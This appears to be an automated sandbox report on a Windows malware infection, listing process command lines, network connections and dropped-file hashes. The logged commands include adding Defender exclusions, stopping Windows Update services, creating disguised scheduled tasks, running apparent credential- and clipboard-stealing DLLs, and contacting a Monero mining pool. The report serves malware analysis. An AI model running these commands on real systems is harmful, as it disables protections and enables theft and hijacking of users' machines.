"C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe"

C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp" /SL5="$13004E,5025136,832512,C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe" --version

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

"C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4012 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005083209" --session-guid=ee4bd72b-54c0-4226-acb4-609088846ce7 --server-tracking-blob=ODc3NjRlMjQ5YzRhZDU2NTI5MjFiMTlmZWJlNGQxMjIxNmI1ZWJmOWQ0NjVmZWFiOTg5ZmFkNmNlZmU2MDI3MTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ5NDcyMS4xNTI4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmZjRkY2NlOS0wZmY4LTQyNDEtOTk2Ny05NjgxYjk1MTU2MjkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5005000000000000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\is-66CBQ.tmp\_isetup\_setup64.tmp

helper 105 0x43C

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2f4,0x2bc,0x2f8,0x6dd98538,0x6dd98548,0x6dd98554

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe

C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2bc,0x2f4,0x6f0c8538,0x6f0c8548,0x6f0c8554

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp" /SL5="$6021E,491750,408064,C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe

"C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe

"C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe"

C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe

"C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe" /VERYSILENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 812

C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NT2BR.tmp\lightcleaner.tmp" /SL5="$D01C6,833775,56832,C:\Program Files\Microsoft Office\RHUHXGVWEU\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050832091\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x10ee8a0,0x10ee8b0,0x10ee8bc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9375617347.exe"

C:\Users\Admin\AppData\Local\Temp\9375617347.exe

"C:\Users\Admin\AppData\Local\Temp\9375617347.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "jULbrBYpeg0IXpoPMkqW0pF3.exe" /f & erase "C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 912 -ip 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 1492

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "jULbrBYpeg0IXpoPMkqW0pF3.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 8 -ip 8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 684

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\9375617347.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 188.114.96.0:443 jetpackdelivery.net tcp
US 172.67.216.81:443 flyawayaero.net tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 104.21.32.208:443 lycheepanel.info tcp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
RU 212.193.49.228:80 goboh2b.top tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 justsafepay.com udp
US 172.67.180.173:443 potatogoose.com tcp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 25.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 228.49.193.212.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 19.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 82.145.216.24:443 download.opera.com tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 16.216.145.82.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 udp
DE 168.119.152.22:443 demo.seafile.com tcp
DE 168.119.152.22:80 demo.seafile.com tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 113.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
DE 52.219.171.138:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 138.171.219.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 188.114.96.1:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 script.google.com udp
NL 149.154.167.99:443 t.me tcp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
DE 116.202.7.149:27015 116.202.7.149 tcp
US 8.8.8.8:53 149.7.202.116.in-addr.arpa udp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 17.169.214.173.in-addr.arpa udp

Files

memory/2120-0-0x00000000002A0000-0x00000000002E8000-memory.dmp

memory/2120-1-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/2120-2-0x0000000004DB0000-0x0000000004E4C000-memory.dmp

memory/2120-3-0x0000000005530000-0x0000000005AD4000-memory.dmp

memory/2120-4-0x0000000005080000-0x0000000005112000-memory.dmp

memory/2120-5-0x0000000005400000-0x0000000005410000-memory.dmp

memory/2120-6-0x0000000004C50000-0x0000000004C5A000-memory.dmp

memory/2120-7-0x0000000004D70000-0x0000000004D98000-memory.dmp

memory/2120-8-0x0000000005310000-0x000000000532A000-memory.dmp

memory/1304-9-0x00000000021B0000-0x00000000021E6000-memory.dmp

memory/1304-11-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/1304-12-0x0000000002230000-0x0000000002240000-memory.dmp

memory/1304-13-0x0000000004BC0000-0x00000000051E8000-memory.dmp

memory/1304-14-0x0000000002230000-0x0000000002240000-memory.dmp

memory/3332-10-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2120-17-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/3332-16-0x0000000074F50000-0x0000000075700000-memory.dmp

memory/3332-18-0x0000000005680000-0x0000000005690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkyyypa3.ufr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1304-19-0x0000000005380000-0x00000000053A2000-memory.dmp

memory/1304-29-0x0000000005540000-0x00000000055A6000-memory.dmp

memory/1304-30-0x0000000005620000-0x0000000005686000-memory.dmp

memory/1304-31-0x0000000005690000-0x00000000059E4000-memory.dmp

C:\Users\Admin\Pictures\7XbwYRCELtuEskigfMcqyZ3a.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/1304-42-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\T5rEEY5jfgtmAbwNPPDalhWC.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

memory/1304-70-0x0000000005B20000-0x0000000005B6C000-memory.dmp

C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe

MD5 ffb1cc96c04308e8cf27d8c8251ee01a
SHA1 2b33aa254e10f473040b8d65b53862b2bea289c4
SHA256 a8dc0238b6272da428b85bba473b20ff20346d759204b8c689b1a8af3a24a9be
SHA512 fb0df2d1c3ba98b8ff681c00a22debfc2445f39d7acd6c532681f7ef2c21d8bdc7f30306d3486182f95697d671fae601c5eb4561056d930f851d4b69c816abc0

C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe

MD5 d88f367b41afa18635f0bfb34183116d
SHA1 9c5ed052125574db17b29db79e1288a2fb4cf645
SHA256 d8795171f1813169491e289f5997f267081a9df66145301f4c75b3d0c01dce3f
SHA512 8187c5f350eb23727544ed9f25f56dcf748f0a97c54b738226e88fdc86f38808768a436b1e3950e8a9774029c0ee1ac5945697488cd9cc9ec6e8a291cb81fa4b

C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

